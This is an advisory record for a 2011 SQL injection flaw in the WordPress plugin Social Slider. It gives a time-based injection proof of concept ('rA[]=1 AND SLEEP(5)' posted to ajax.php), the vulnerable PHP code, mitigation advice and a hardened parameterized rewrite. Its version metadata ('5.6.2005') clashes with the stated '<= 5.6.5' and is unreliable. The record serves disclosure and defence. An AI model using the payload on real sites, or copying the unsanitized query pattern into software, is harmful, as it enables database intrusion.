Vendor: Social Slider
By: Miroslav Stampar
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Social Slider
Affected Version From: 5.6.2005
Affected Version To: 5.6.2005
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:social_slider
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

Social Slider <= 5.6.5 SQL Injection Vulnerability

Social Slider is vulnerable to SQL injection due to improper sanitization of user-supplied input in the 'action' and 'rA[]' parameters of the 'ajax.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Parameterized queries should be used to avoid SQL injection.

Exploit-DB raw data:

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
<?php 
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;

$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;    
        }
    }
?>
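
The handler above, rewritten along the lines of the Mitigation section, as an added example that is not the plugin's own code or a vendor patch. It assumes WordPress's `$wpdb` object is available once `wp-config.php` is loaded and that record ids are plain decimal integers.

```php
<?php
// Added example: hardened rewrite of the handler shown above (not the plugin's code).
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb;

// Compare the action directly; escaping adds nothing to a string comparison.
$action = isset($_POST['action']) ? $_POST['action'] : '';
// rA must be an array; any other shape is treated as empty.
$ids = (isset($_POST['rA']) && is_array($_POST['rA'])) ? $_POST['rA'] : array();

if ($action === 'ZapiszPozycje') {
    $table = $wpdb->prefix . 'socialslider';
    $position = 1;
    foreach ($ids as $raw) {
        // Input validation: accept only strings made of decimal digits.
        if (!is_string($raw) || !ctype_digit($raw)) {
            continue; // "1 AND SLEEP(5)" is skipped and never reaches the database
        }
        // Parameterized query: %d binds both values as integers.
        $wpdb->query($wpdb->prepare(
            "UPDATE {$table} SET lp = %d WHERE id = %d",
            $position,
            (int) $raw
        ));
        $position++;
    }
}
```

Unlike the original loop, this version advances the position counter only for ids that pass validation, so rejected entries do not leave gaps in `lp`.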